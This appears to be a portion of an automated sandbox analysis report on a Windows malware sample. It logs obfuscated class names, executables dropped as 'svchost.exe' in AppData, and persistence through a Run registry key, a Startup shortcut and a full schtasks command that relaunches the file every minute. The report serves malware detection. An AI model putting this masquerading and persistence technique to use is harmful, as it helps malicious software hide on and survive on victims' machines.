                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.csHigh entropy of concatenated method names: 'VvUamQexaLlDSalFARrQ9qHIOZJfWN1iZ4ag2Lp7oXLz1MRSGNPbsd8Gt5Sr6obsftbYOmO9', 'zG3nb7fsHCEEysakSCoXMtXSWtu6P63EXfJ4trA16aN5TL0jpYPB67f1mF6VV5pI8Vhj3eH7', 'cv6Qnju0tteEsmlaLOWtJAIUXwmlh8WAwx7FxLcPmRTLURaW9D1BRuDD3JBghv32kkwIhqCl', 'WrTjibEG30Y876mYzzNigsYB4cCBy7OQP84LInxtko3aFLXPPwSmYXWBWNILr5vufz9siHuD', 'dHmqVMg6wdknYUDXNdNz9ouCv8mvI06UYX7QIYMIhYj1LrLh6JCxpEwD0hqsQbk2pbkrbJIa', 'gLf7Z007cJpisow', 'uZj9L9WKLXAHIID', 'nf23VrFvRsIEPgv', 'eNb920YNU2Y66xb', '_1e9PhazEhD3rZcw'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, 8KcBCZ9DCxKcKbF0FzfHqT16Ch1DMyJIO0Y5GGZtWjWIgyYVuRr4V5O.csHigh entropy of concatenated method names: 'rmYdAier1qI05Aechiv2ssjdZX9qhSbgOaAJ7uH4HlEgIdQL8TMnynq', 'X6bs1VKVEz', '_7vCg3MX6UP', 'f4ewYMWxqB', 'qGDDMD7OAG'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, ktrFv2sOGwgIA9mekycjF1J3zeN8nu5eTtArKzFhw4oWEqfOdr8PLFPBGGJc0G4nBLrrbImb.csHigh entropy of concatenated method names: 'D6awLwsnT57uNrWDTfeufUJG8coJ97yfrz6Shub48ttMidXaru6dE3ivDB2dT21wtypsvoIR', 'oc58B3p2e5VnNQkOzhef7lvysxQIFgrPZE7JwlyZW4NBEwbfqNgAGIGVhCN5C4euuvceBcCN', '_7hAEB9ijwrrolHvJH8x4xi1rQvEB5e4QwJeG3oIPmOwkKOVvFmTGhBZmbB4Z6pP57exSfdz8', 'j8Vl82dVthVO8INk3TupIUVcYJlhMamIQteNscY8sgRTPoUlGMbTLIKSPGluQlA0F5ikg1iR', '_1Ojp6wqZet', 'qdN8pelKqa', 'p1ATG6liVR', 'fxU4QSNMBd', 'zwpeOddA3A', 'HKX8PLsgAD'

                  Persistence and Installation Behavior

                  barindex
                  Drops PE files with benign system names
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\All function.exeFile created: C:\Users\user\AppData\Roaming\ALL slumzick.exeJump to dropped file
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\All function.exeJump to dropped file
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
